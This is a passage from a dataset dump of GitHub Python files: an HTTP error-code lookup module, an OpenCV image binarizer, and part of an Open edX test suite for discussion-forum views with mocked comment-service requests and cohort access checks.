#第一行和第一行利用皮尔逊距离计算相似度\n\nprint(myMat)","repo_name":"Wangman1/Machine-Learning-in-Action","sub_path":"My Code/chap 14/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18420590803","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @namespace pyfortified_requests\n\nfrom pyhttpstatus_utils import HTTP_STATUS_DESC_DICT\nfrom pyhttpstatus_utils import HTTP_STATUS_PHRASE_DICT\n\nREQUESTS_FORTIFIED_ERROR_NAME_DICT = {\n -1: 'Unassigned',\n 0: 'Success',\n 600: 'Module Error',\n 601: 'Argument Error',\n 602: 'Request Error',\n 603: 'Software Error',\n 604: 'Unexpected Value',\n 605: 'Request HTTP',\n 606: 'Request Connect',\n 607: 'Request Redirect',\n 608: 'Retry Exhausted',\n 609: 'Unexpected content-type returned',\n 610: 'Upload Data Error',\n 611: 'Auth Error',\n 612: 'Auth JSON Error',\n 613: 'Auth Response Error',\n 614: 'JSON Decoding Error',\n 699: 'Unexpected Error'\n}\n\nREQUESTS_FORTIFIED_ERROR_DESC_DICT = {\n -1: 'Unassiged exit condition',\n 0: 'Successfully completed',\n 600: 'Error occurred somewhere within module',\n 601: 'Invalid or missing argument provided',\n 602: 'Unexpected request failure',\n 603: 'Unexpected software error was detected',\n 604: 'Unexpected value returned',\n 605: 'Request HTTP error occurred',\n 606: 'Request Connection error occurred',\n 607: 'Request Redirect',\n 608: 'Retry Exhausted',\n 609: 'Unexpected content-type returned',\n 610: 'Upload Data Error',\n 611: 'Auth Error',\n 612: 'Auth JSON Error',\n 613: 'Auth Response Error',\n 614: 'JSON Decoding Error',\n 699: 'Unexpected Error'\n}\n\n\ndef error_name(error_code, return_bool=False):\n \"\"\"Provide definition of Error Code\n\n Args:\n error_code:\n\n Returns:\n\n \"\"\"\n if error_code is None or not isinstance(error_code, int):\n return \"Error Code: Invalid Type: %d\" % error_code\n\n exit_code_name_ = HTTP_STATUS_PHRASE_DICT.get(error_code, None)\n if exit_code_name_ is not None:\n return exit_code_name_\n\n exit_code_name_ = REQUESTS_FORTIFIED_ERROR_NAME_DICT.get(error_code, None)\n if exit_code_name_ is not None:\n return exit_code_name_\n\n return False if return_bool else \"Error Code: Undefined: %d\" % error_code\n\n\ndef error_desc(error_code, return_bool=False):\n \"\"\"Provide definition of Error Code\n\n Args:\n error_code:\n\n Returns:\n\n \"\"\"\n if error_code is None or not isinstance(error_code, int):\n return \"Error Code: Invalid Type: %d\" % error_code\n\n exit_code_description_ = HTTP_STATUS_DESC_DICT.get(error_code, None)\n if exit_code_description_ is not None:\n return exit_code_description_\n\n exit_code_description_ = REQUESTS_FORTIFIED_ERROR_DESC_DICT.get(error_code, None)\n if exit_code_description_ is not None:\n return exit_code_description_\n\n return False if return_bool else \"Error Code: Undefined: %d\" % error_code\n","repo_name":"jeff00seattle/pyfortified-requests","sub_path":"pyfortified_requests/errors/error_desc.py","file_name":"error_desc.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"34938799333","text":"import cv2\n\nclass Binarizer():\n def __init__(self, background_path, threshold):\n self.__background = background_path\n self.__threshold = threshold\n\n def binarization(self, image):\n img_back = cv2.imread(self.__background)\n img_comp = image\n\n img_back_gray = cv2.cvtColor(img_back, cv2.COLOR_BGR2GRAY)\n img_comp_gray = cv2.cvtColor(img_comp, cv2.COLOR_BGR2GRAY)\n\n img_comp_gray = cv2.blur(img_comp_gray, (3, 3))\n\n #差分画像を生成\n img_diff = cv2.absdiff(img_back_gray, img_comp_gray)\n\n #差分画像の2値化(モノクロ化)する。閾値は50に設定\n ret, img_bin = cv2.threshold(img_diff, 50 , 255, cv2.THRESH_BINARY_INV)\n\n return img_bin\n \n","repo_name":"diinuma/ObjectDetection-webcam","sub_path":"binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12605978103","text":"\"\"\"\nTests the forum notification views.\n\"\"\"\nimport json\nimport logging\nfrom datetime import datetime\nfrom unittest.mock import ANY, Mock, call, patch\n\nimport ddt\nimport pytest\nfrom django.conf import settings\nfrom django.http import Http404\nfrom django.test.client import Client, RequestFactory\nfrom django.test.utils import override_settings\nfrom django.urls import reverse\nfrom django.utils import translation\nfrom edx_django_utils.cache import RequestCache\nfrom edx_toggles.toggles.testutils import override_waffle_flag\nfrom xmodule.modulestore import ModuleStoreEnum\nfrom xmodule.modulestore.django import modulestore\nfrom xmodule.modulestore.tests.django_utils import (\n TEST_DATA_SPLIT_MODULESTORE,\n ModuleStoreTestCase,\n SharedModuleStoreTestCase\n)\nfrom xmodule.modulestore.tests.factories import (\n CourseFactory,\n BlockFactory,\n check_mongo_calls\n)\n\nfrom common.djangoapps.course_modes.models import CourseMode\nfrom common.djangoapps.course_modes.tests.factories import CourseModeFactory\nfrom common.djangoapps.student.roles import CourseStaffRole, UserBasedRole\nfrom common.djangoapps.student.tests.factories import AdminFactory, CourseEnrollmentFactory, UserFactory\nfrom common.djangoapps.util.testing import EventTestMixin, UrlResetMixin\nfrom lms.djangoapps.courseware.exceptions import CourseAccessRedirect\nfrom lms.djangoapps.discussion import views\nfrom lms.djangoapps.discussion.django_comment_client.constants import TYPE_ENTRY, TYPE_SUBCATEGORY\nfrom lms.djangoapps.discussion.django_comment_client.permissions import get_team\nfrom lms.djangoapps.discussion.django_comment_client.tests.group_id import (\n CohortedTopicGroupIdTestMixin,\n GroupIdAssertionMixin,\n NonCohortedTopicGroupIdTestMixin\n)\nfrom lms.djangoapps.discussion.django_comment_client.tests.unicode import UnicodeTestMixin\nfrom lms.djangoapps.discussion.django_comment_client.tests.utils import (\n CohortedTestCase,\n ForumsEnableMixin,\n config_course_discussions,\n topic_name_to_id\n)\nfrom lms.djangoapps.discussion.django_comment_client.utils import strip_none\nfrom lms.djangoapps.discussion.toggles import ENABLE_DISCUSSIONS_MFE\nfrom lms.djangoapps.discussion.views import _get_discussion_default_topic_id, course_discussions_settings_handler\nfrom lms.djangoapps.teams.tests.factories import CourseTeamFactory, CourseTeamMembershipFactory\nfrom openedx.core.djangoapps.course_groups.models import CourseUserGroup\nfrom openedx.core.djangoapps.course_groups.tests.helpers import config_course_cohorts\nfrom openedx.core.djangoapps.course_groups.tests.test_views import CohortViewsTestCase\nfrom openedx.core.djangoapps.django_comment_common.comment_client.utils import CommentClientPaginatedResult\nfrom openedx.core.djangoapps.django_comment_common.models import (\n FORUM_ROLE_STUDENT,\n CourseDiscussionSettings,\n ForumsConfig\n)\nfrom openedx.core.djangoapps.django_comment_common.utils import ThreadContext, seed_permissions_roles\nfrom openedx.core.djangoapps.util.testing import ContentGroupTestCase\nfrom openedx.core.djangoapps.waffle_utils.testutils import WAFFLE_TABLES\nfrom openedx.core.lib.teams_config import TeamsConfig\nfrom openedx.features.content_type_gating.models import ContentTypeGatingConfig\nfrom openedx.features.enterprise_support.tests.mixins.enterprise import EnterpriseTestConsentRequired\n\nlog = logging.getLogger(__name__)\n\nQUERY_COUNT_TABLE_IGNORELIST = WAFFLE_TABLES\n\n\nclass ViewsExceptionTestCase(UrlResetMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n\n # Patching the ENABLE_DISCUSSION_SERVICE value affects the contents of urls.py,\n # so we need to call super.setUp() which reloads urls.py (because\n # of the UrlResetMixin)\n super().setUp()\n\n # create a course\n self.course = CourseFactory.create(org='MITx', course='999',\n display_name='Robot Super Course')\n\n # Patch the comment client user save method so it does not try\n # to create a new cc user when creating a django user\n with patch('common.djangoapps.student.models.user.cc.User.save'):\n uname = 'student'\n email = 'student@edx.org'\n password = 'test'\n\n # Create the student\n self.student = UserFactory(username=uname, password=password, email=email)\n\n # Enroll the student in the course\n CourseEnrollmentFactory(user=self.student, course_id=self.course.id)\n\n # Log the student in\n self.client = Client()\n assert self.client.login(username=uname, password=password)\n\n config = ForumsConfig.current()\n config.enabled = True\n config.save()\n\n @patch('common.djangoapps.student.models.user.cc.User.from_django_user')\n @patch('common.djangoapps.student.models.user.cc.User.active_threads')\n def test_user_profile_exception(self, mock_threads, mock_from_django_user):\n\n # Mock the code that makes the HTTP requests to the cs_comment_service app\n # for the profiled user's active threads\n mock_threads.return_value = [], 1, 1\n\n # Mock the code that makes the HTTP request to the cs_comment_service app\n # that gets the current user's info\n mock_from_django_user.return_value = Mock()\n\n url = reverse('user_profile',\n kwargs={'course_id': str(self.course.id), 'user_id': '12345'}) # There is no user 12345\n response = self.client.get(url)\n assert response.status_code == 404\n\n @patch('common.djangoapps.student.models.user.cc.User.from_django_user')\n @patch('common.djangoapps.student.models.user.cc.User.subscribed_threads')\n def test_user_followed_threads_exception(self, mock_threads, mock_from_django_user):\n\n # Mock the code that makes the HTTP requests to the cs_comment_service app\n # for the profiled user's active threads\n mock_threads.return_value = CommentClientPaginatedResult(collection=[], page=1, num_pages=1)\n\n # Mock the code that makes the HTTP request to the cs_comment_service app\n # that gets the current user's info\n mock_from_django_user.return_value = Mock()\n\n url = reverse('followed_threads',\n kwargs={'course_id': str(self.course.id), 'user_id': '12345'}) # There is no user 12345\n response = self.client.get(url)\n assert response.status_code == 404\n\n\ndef make_mock_thread_data( # lint-amnesty, pylint: disable=missing-function-docstring\n course,\n text,\n thread_id,\n num_children,\n group_id=None,\n group_name=None,\n commentable_id=None,\n is_commentable_divided=None,\n anonymous=False,\n anonymous_to_peers=False,\n):\n data_commentable_id = (\n commentable_id or course.discussion_topics.get('General', {}).get('id') or \"dummy_commentable_id\"\n )\n thread_data = {\n \"id\": thread_id,\n \"type\": \"thread\",\n \"title\": text,\n \"body\": text,\n \"commentable_id\": data_commentable_id,\n \"resp_total\": 42,\n \"resp_skip\": 25,\n \"resp_limit\": 5,\n \"group_id\": group_id,\n \"anonymous\": anonymous,\n \"anonymous_to_peers\": anonymous_to_peers,\n \"context\": (\n ThreadContext.COURSE if get_team(data_commentable_id) is None else ThreadContext.STANDALONE\n )\n }\n if group_id is not None:\n thread_data['group_name'] = group_name\n if is_commentable_divided is not None:\n thread_data['is_commentable_divided'] = is_commentable_divided\n if num_children is not None:\n thread_data[\"children\"] = [{\n \"id\": f\"dummy_comment_id_{i}\",\n \"type\": \"comment\",\n \"body\": text,\n } for i in range(num_children)]\n return thread_data\n\n\ndef make_mock_collection_data( # lint-amnesty, pylint: disable=missing-function-docstring\n course,\n text,\n thread_id,\n num_children=None,\n group_id=None,\n commentable_id=None,\n thread_list=None\n):\n if thread_list:\n return [\n make_mock_thread_data(course=course, text=text, num_children=num_children, **thread)\n for thread in thread_list\n ]\n else:\n return [\n make_mock_thread_data(\n course=course,\n text=text,\n thread_id=thread_id,\n num_children=num_children,\n group_id=group_id,\n commentable_id=commentable_id,\n )\n ]\n\n\ndef make_mock_perform_request_impl( # lint-amnesty, pylint: disable=missing-function-docstring\n course,\n text,\n thread_id=\"dummy_thread_id\",\n group_id=None,\n commentable_id=None,\n num_thread_responses=1,\n thread_list=None,\n anonymous=False,\n anonymous_to_peers=False,\n):\n def mock_perform_request_impl(*args, **kwargs):\n url = args[1]\n if url.endswith(\"threads\") or url.endswith(\"user_profile\"):\n return {\n \"collection\": make_mock_collection_data(\n course, text, thread_id, None, group_id, commentable_id, thread_list\n )\n }\n elif thread_id and url.endswith(thread_id):\n return make_mock_thread_data(\n course=course,\n text=text,\n thread_id=thread_id,\n num_children=num_thread_responses,\n group_id=group_id,\n commentable_id=commentable_id,\n anonymous=anonymous,\n anonymous_to_peers=anonymous_to_peers,\n )\n elif \"/users/\" in url:\n res = {\n \"default_sort_key\": \"date\",\n \"upvoted_ids\": [],\n \"downvoted_ids\": [],\n \"subscribed_thread_ids\": [],\n }\n # comments service adds these attributes when course_id param is present\n if kwargs.get('params', {}).get('course_id'):\n res.update({\n \"threads_count\": 1,\n \"comments_count\": 2\n })\n return res\n else:\n return None\n return mock_perform_request_impl\n\n\ndef make_mock_request_impl( # lint-amnesty, pylint: disable=missing-function-docstring\n course,\n text,\n thread_id=\"dummy_thread_id\",\n group_id=None,\n commentable_id=None,\n num_thread_responses=1,\n thread_list=None,\n anonymous=False,\n anonymous_to_peers=False,\n):\n impl = make_mock_perform_request_impl(\n course,\n text,\n thread_id=thread_id,\n group_id=group_id,\n commentable_id=commentable_id,\n num_thread_responses=num_thread_responses,\n thread_list=thread_list,\n anonymous=anonymous,\n anonymous_to_peers=anonymous_to_peers,\n )\n\n def mock_request_impl(*args, **kwargs):\n data = impl(*args, **kwargs)\n if data:\n return Mock(status_code=200, text=json.dumps(data), json=Mock(return_value=data))\n else:\n return Mock(status_code=404)\n return mock_request_impl\n\n\nclass StringEndsWithMatcher: # lint-amnesty, pylint: disable=missing-class-docstring\n def __init__(self, suffix):\n self.suffix = suffix\n\n def __eq__(self, other):\n return other.endswith(self.suffix)\n\n\nclass PartialDictMatcher: # lint-amnesty, pylint: disable=missing-class-docstring\n def __init__(self, expected_values):\n self.expected_values = expected_values\n\n def __eq__(self, other):\n return all(\n key in other and other[key] == value\n for key, value in self.expected_values.items()\n )\n\n\n@patch('requests.request', autospec=True)\nclass SingleThreadTestCase(ForumsEnableMixin, ModuleStoreTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n CREATE_USER = False\n\n def setUp(self):\n super().setUp()\n\n self.course = CourseFactory.create(discussion_topics={'dummy discussion': {'id': 'dummy_discussion_id'}})\n self.student = UserFactory.create()\n CourseEnrollmentFactory.create(user=self.student, course_id=self.course.id)\n\n def test_ajax(self, mock_request):\n text = \"dummy content\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text, thread_id=thread_id)\n\n request = RequestFactory().get(\n \"dummy_url\",\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = self.student\n response = views.single_thread(\n request,\n str(self.course.id),\n \"dummy_discussion_id\",\n \"test_thread_id\"\n )\n\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n # strip_none is being used to perform the same transform that the\n # django view performs prior to writing thread data to the response\n assert response_data['content'] == strip_none(make_mock_thread_data(\n course=self.course,\n text=text,\n thread_id=thread_id,\n num_children=1\n ))\n mock_request.assert_called_with(\n \"get\",\n StringEndsWithMatcher(thread_id), # url\n data=None,\n params=PartialDictMatcher({\"mark_as_read\": True, \"user_id\": 1, \"recursive\": True}),\n headers=ANY,\n timeout=ANY\n )\n\n def test_skip_limit(self, mock_request):\n text = \"dummy content\"\n thread_id = \"test_thread_id\"\n response_skip = \"45\"\n response_limit = \"15\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text, thread_id=thread_id)\n\n request = RequestFactory().get(\n \"dummy_url\",\n {\"resp_skip\": response_skip, \"resp_limit\": response_limit},\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = self.student\n response = views.single_thread(\n request,\n str(self.course.id),\n \"dummy_discussion_id\",\n \"test_thread_id\"\n )\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n # strip_none is being used to perform the same transform that the\n # django view performs prior to writing thread data to the response\n assert response_data['content'] == strip_none(make_mock_thread_data(\n course=self.course,\n text=text,\n thread_id=thread_id,\n num_children=1\n ))\n mock_request.assert_called_with(\n \"get\",\n StringEndsWithMatcher(thread_id), # url\n data=None,\n params=PartialDictMatcher({\n \"mark_as_read\": True,\n \"user_id\": 1,\n \"recursive\": True,\n \"resp_skip\": response_skip,\n \"resp_limit\": response_limit,\n }),\n headers=ANY,\n timeout=ANY\n )\n\n def test_post(self, _mock_request):\n request = RequestFactory().post(\"dummy_url\")\n response = views.single_thread(\n request,\n str(self.course.id),\n \"dummy_discussion_id\",\n \"dummy_thread_id\"\n )\n assert response.status_code == 405\n\n def test_post_anonymous_to_ta(self, mock_request):\n text = \"dummy content\"\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=text, thread_id=thread_id,\n anonymous_to_peers=True)\n\n request = RequestFactory().get(\n \"dummy_url\",\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = self.student\n request.user.is_community_ta = True\n response = views.single_thread(\n request,\n str(self.course.id),\n \"dummy_discussion_id\",\n \"test_thread_id\"\n )\n\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n # user is community ta, so response must not have username and user_id fields\n assert response_data['content'].get('username') is None\n assert response_data['content'].get('user_id') is None\n\n def test_not_found(self, mock_request):\n request = RequestFactory().get(\"dummy_url\")\n request.user = self.student\n # Mock request to return 404 for thread request\n mock_request.side_effect = make_mock_request_impl(course=self.course, text=\"dummy\", thread_id=None)\n self.assertRaises(\n Http404,\n views.single_thread,\n request,\n str(self.course.id),\n \"test_discussion_id\",\n \"test_thread_id\"\n )\n\n def test_private_team_thread_html(self, mock_request):\n discussion_topic_id = 'dummy_discussion_id'\n thread_id = 'test_thread_id'\n CourseTeamFactory.create(discussion_topic_id=discussion_topic_id)\n user_not_in_team = UserFactory.create()\n CourseEnrollmentFactory.create(user=user_not_in_team, course_id=self.course.id)\n self.client.login(username=user_not_in_team.username, password=self.TEST_PASSWORD)\n\n mock_request.side_effect = make_mock_request_impl(\n course=self.course,\n text=\"dummy\",\n thread_id=thread_id,\n commentable_id=discussion_topic_id\n )\n with patch('lms.djangoapps.teams.api.is_team_discussion_private', autospec=True) as mocked:\n mocked.return_value = True\n response = self.client.get(\n reverse('single_thread', kwargs={\n 'course_id': str(self.course.id),\n 'discussion_id': discussion_topic_id,\n 'thread_id': thread_id,\n })\n )\n assert response.status_code == 200\n assert response['Content-Type'] == 'text/html; charset=utf-8'\n html = response.content.decode('utf-8')\n # Verify that the access denied error message is in the HTML\n assert 'This is a private discussion. You do not have permissions to view this discussion' in html\n\n\nclass AllowPlusOrMinusOneInt(int):\n \"\"\"\n A workaround for the fact that assertNumQueries doesn't let you\n specify a range or any tolerance. An 'int' that is 'equal to' its value,\n but also its value +/- 1\n \"\"\"\n\n def __init__(self, value):\n super().__init__()\n self.value = value\n self.values = (value, value - 1, value + 1)\n\n def __eq__(self, other):\n return other in self.values\n\n def __repr__(self):\n return f\"({self.value} +/- 1)\"\n\n\n@ddt.ddt\n@patch('requests.request', autospec=True)\nclass SingleThreadQueryCountTestCase(ForumsEnableMixin, ModuleStoreTestCase):\n \"\"\"\n Ensures the number of modulestore queries and number of sql queries are\n independent of the number of responses retrieved for a given discussion thread.\n \"\"\"\n @ddt.data(\n # split mongo: 3 queries, regardless of thread response size.\n (False, 1, 2, 2, 21, 8),\n (False, 50, 2, 2, 21, 8),\n\n # Enabling Enterprise integration should have no effect on the number of mongo queries made.\n # split mongo: 3 queries, regardless of thread response size.\n (True, 1, 2, 2, 21, 8),\n (True, 50, 2, 2, 21, 8),\n )\n @ddt.unpack\n def test_number_of_mongo_queries(\n self,\n enterprise_enabled,\n num_thread_responses,\n num_uncached_mongo_calls,\n num_cached_mongo_calls,\n num_uncached_sql_queries,\n num_cached_sql_queries,\n mock_request\n ):\n ContentTypeGatingConfig.objects.create(enabled=True, enabled_as_of=datetime(2018, 1, 1))\n with modulestore().default_store(ModuleStoreEnum.Type.split):\n course = CourseFactory.create(discussion_topics={'dummy discussion': {'id': 'dummy_discussion_id'}})\n\n student = UserFactory.create()\n CourseEnrollmentFactory.create(user=student, course_id=course.id)\n\n test_thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(\n course=course, text=\"dummy content\", thread_id=test_thread_id, num_thread_responses=num_thread_responses\n )\n request = RequestFactory().get(\n \"dummy_url\",\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = student\n\n def call_single_thread():\n \"\"\"\n Call single_thread and assert that it returns what we expect.\n \"\"\"\n with patch.dict(\"django.conf.settings.FEATURES\", dict(ENABLE_ENTERPRISE_INTEGRATION=enterprise_enabled)):\n response = views.single_thread(\n request,\n str(course.id),\n \"dummy_discussion_id\",\n test_thread_id\n )\n assert response.status_code == 200\n assert len(json.loads(response.content.decode('utf-8'))['content']['children']) == num_thread_responses\n\n # Test uncached first, then cached now that the cache is warm.\n cached_calls = [\n [num_uncached_mongo_calls, num_uncached_sql_queries],\n # Sometimes there will be one more or fewer sql call than expected, because the call to\n # CourseMode.modes_for_course sometimes does / doesn't get cached and does / doesn't hit the DB.\n # EDUCATOR-5167\n [num_cached_mongo_calls, AllowPlusOrMinusOneInt(num_cached_sql_queries)],\n ]\n for expected_mongo_calls, expected_sql_queries in cached_calls:\n with self.assertNumQueries(expected_sql_queries, table_ignorelist=QUERY_COUNT_TABLE_IGNORELIST):\n with check_mongo_calls(expected_mongo_calls):\n call_single_thread()\n\n\n@patch('requests.request', autospec=True)\nclass SingleCohortedThreadTestCase(CohortedTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n def _create_mock_cohorted_thread(self, mock_request): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_text = \"dummy content\"\n mock_thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=mock_text,\n thread_id=mock_thread_id,\n group_id=self.student_cohort.id,\n commentable_id=\"cohorted_topic\",\n )\n return mock_text, mock_thread_id\n\n def test_ajax(self, mock_request):\n mock_text, mock_thread_id = self._create_mock_cohorted_thread(mock_request)\n\n request = RequestFactory().get(\n \"dummy_url\",\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = self.student\n response = views.single_thread(\n request,\n str(self.course.id),\n \"cohorted_topic\",\n mock_thread_id\n )\n\n assert response.status_code == 200\n response_data = json.loads(response.content.decode('utf-8'))\n assert response_data['content'] == make_mock_thread_data(\n course=self.course,\n commentable_id='cohorted_topic',\n text=mock_text,\n thread_id=mock_thread_id,\n num_children=1,\n group_id=self.student_cohort.id,\n group_name=self.student_cohort.name,\n is_commentable_divided=True\n )\n\n def test_html(self, mock_request):\n _mock_text, mock_thread_id = self._create_mock_cohorted_thread(mock_request)\n\n self.client.login(username=self.student.username, password=self.TEST_PASSWORD)\n response = self.client.get(\n reverse('single_thread', kwargs={\n 'course_id': str(self.course.id),\n 'discussion_id': \"cohorted_topic\",\n 'thread_id': mock_thread_id,\n })\n )\n\n assert response.status_code == 200\n assert response['Content-Type'] == 'text/html; charset=utf-8'\n html = response.content.decode('utf-8')\n\n # Verify that the group name is correctly included in the HTML\n self.assertRegex(html, r'\"group_name\": \"student_cohort\"')\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass SingleThreadAccessTestCase(CohortedTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n def call_view(self, mock_request, commentable_id, user, group_id, thread_group_id=None, pass_group_id=True): # lint-amnesty, pylint: disable=missing-function-docstring\n thread_id = \"test_thread_id\"\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=\"dummy context\", thread_id=thread_id, group_id=thread_group_id\n )\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n request = RequestFactory().get(\n \"dummy_url\",\n data=request_data,\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n request.user = user\n return views.single_thread(\n request,\n str(self.course.id),\n commentable_id,\n thread_id\n )\n\n def test_student_non_cohorted(self, mock_request):\n resp = self.call_view(mock_request, \"non_cohorted_topic\", self.student, self.student_cohort.id)\n assert resp.status_code == 200\n\n def test_student_same_cohort(self, mock_request):\n resp = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n thread_group_id=self.student_cohort.id\n )\n assert resp.status_code == 200\n\n # this test ensures that a thread response from the cs with group_id: null\n # behaves the same as a thread response without a group_id (see: TNL-444)\n def test_student_global_thread_in_cohorted_topic(self, mock_request):\n resp = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n thread_group_id=None\n )\n assert resp.status_code == 200\n\n def test_student_different_cohort(self, mock_request):\n pytest.raises(Http404, (lambda: self.call_view(\n mock_request,\n 'cohorted_topic',\n self.student,\n self.student_cohort.id,\n thread_group_id=self.moderator_cohort.id\n )))\n\n def test_moderator_non_cohorted(self, mock_request):\n resp = self.call_view(mock_request, \"non_cohorted_topic\", self.moderator, self.moderator_cohort.id)\n assert resp.status_code == 200\n\n def test_moderator_same_cohort(self, mock_request):\n resp = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.moderator,\n self.moderator_cohort.id,\n thread_group_id=self.moderator_cohort.id\n )\n assert resp.status_code == 200\n\n def test_moderator_different_cohort(self, mock_request):\n resp = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.moderator,\n self.moderator_cohort.id,\n thread_group_id=self.student_cohort.id\n )\n assert resp.status_code == 200\n\n def test_private_team_thread(self, mock_request):\n CourseTeamFactory.create(discussion_topic_id='dummy_discussion_id')\n user_not_in_team = UserFactory.create()\n CourseEnrollmentFactory(user=user_not_in_team, course_id=self.course.id)\n\n with patch('lms.djangoapps.teams.api.is_team_discussion_private', autospec=True) as mocked:\n mocked.return_value = True\n response = self.call_view(\n mock_request,\n 'non_cohorted_topic',\n user_not_in_team,\n ''\n )\n assert 403 == response.status_code\n assert views.TEAM_PERMISSION_MESSAGE == response.content.decode('utf-8')\n\n\n@patch('openedx.core.djangoapps.django_comment_common.comment_client.utils.requests.request', autospec=True)\nclass SingleThreadGroupIdTestCase(CohortedTestCase, GroupIdAssertionMixin): # lint-amnesty, pylint: disable=missing-class-docstring\n cs_endpoint = \"/threads/dummy_thread_id\"\n\n def call_view(self, mock_request, commentable_id, user, group_id, pass_group_id=True, is_ajax=False): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(\n course=self.course, text=\"dummy context\", group_id=self.student_cohort.id\n )\n\n request_data = {}\n if pass_group_id:\n request_data[\"group_id\"] = group_id\n headers = {}\n if is_ajax:\n headers['HTTP_X_REQUESTED_WITH'] = \"XMLHttpRequest\"\n\n self.client.login(username=user.username, password=self.TEST_PASSWORD)\n\n return self.client.get(\n reverse('single_thread', args=[str(self.course.id), commentable_id, \"dummy_thread_id\"]),\n data=request_data,\n **headers\n )\n\n def test_group_info_in_html_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n is_ajax=False\n )\n self._assert_html_response_contains_group_info(response)\n\n def test_group_info_in_ajax_response(self, mock_request):\n response = self.call_view(\n mock_request,\n \"cohorted_topic\",\n self.student,\n self.student_cohort.id,\n is_ajax=True\n )\n self._assert_json_response_contains_group_info(\n response, lambda d: d['content']\n )\n\n\n@patch('requests.request', autospec=True)\nclass ForumFormDiscussionContentGroupTestCase(ForumsEnableMixin, ContentGroupTestCase):\n \"\"\"\n Tests `forum_form_discussion api` works with different content groups.\n Discussion blocks are setup in ContentGroupTestCase class i.e\n alpha_block => alpha_group_discussion => alpha_cohort => alpha_user/community_ta\n beta_block => beta_group_discussion => beta_cohort => beta_user\n \"\"\"\n\n @patch.dict(\"django.conf.settings.FEATURES\", {\"ENABLE_DISCUSSION_SERVICE\": True})\n def setUp(self):\n super().setUp()\n self.thread_list = [\n {\"thread_id\": \"test_general_thread_id\"},\n {\"thread_id\": \"test_global_group_thread_id\", \"commentable_id\": self.global_block.discussion_id},\n {\"thread_id\": \"test_alpha_group_thread_id\", \"group_id\": self.alpha_block.group_access[0][0],\n \"commentable_id\": self.alpha_block.discussion_id},\n {\"thread_id\": \"test_beta_group_thread_id\", \"group_id\": self.beta_block.group_access[0][0],\n \"commentable_id\": self.beta_block.discussion_id}\n ]\n\n def assert_has_access(self, response, expected_discussion_threads):\n \"\"\"\n Verify that a users have access to the threads in their assigned\n cohorts and non-cohorted blocks.\n \"\"\"\n discussion_data = json.loads(response.content.decode('utf-8'))['discussion_data']\n assert len(discussion_data) == expected_discussion_threads\n\n def call_view(self, mock_request, user): # lint-amnesty, pylint: disable=missing-function-docstring\n mock_request.side_effect = make_mock_request_impl(\n course=self.course,\n text=\"dummy content\",\n thread_list=self.thread_list\n )\n self.client.login(username=user.username, password=self.TEST_PASSWORD)\n return self.client.get(\n reverse(\"forum_form_discussion\", args=[str(self.course.id)]),\n HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\"\n )\n\n def test_community_ta_user(self, mock_request):\n \"\"\"\n Verify that community_ta user has access to all threads regardless\n of cohort.\n \"\"\"\n response = self.call_view(\n mock_request,\n self.community_ta\n )\n self.assert_has_access(response, 4)\n\n def test_alpha_cohort_user(self, mock_request):\n \"\"\"\n Verify that alpha_user has access to alpha_cohort and non-cohorted\n threads.\n \"\"\"\n response = self.call_view(\n mock_request,\n self.alpha_user\n )\n self.assert_has_access(response, 3)\n\n def test_beta_cohort_user(self, mock_request):\n \"\"\"\n Verify that beta_user has access to beta_cohort and non-cohorted\n threads.\n \"\"\"\n response = self.call_view(\n mock_request,\n self.beta_user\n )\n self.assert_has_access(response, 3)\n\n def test_global_staff_user(self, mock_request):\n \"\"\"\n Verify that global staff user has access to all threads regardless\n of cohort.\n \"\"\"\n response = self.call_view(\n mock_request,\n self.staff_user\n )\n self.assert_has_access(response, 4)\n\n\n@patch('requests.request', autospec=True)\nclass SingleThreadContentGroupTestCase(ForumsEnableMixin, UrlResetMixin, ContentGroupTestCase): # lint-amnesty, pylint: disable=missing-class-docstring\n\n @patch.dict(\"django.conf.settings.FEATURES\", 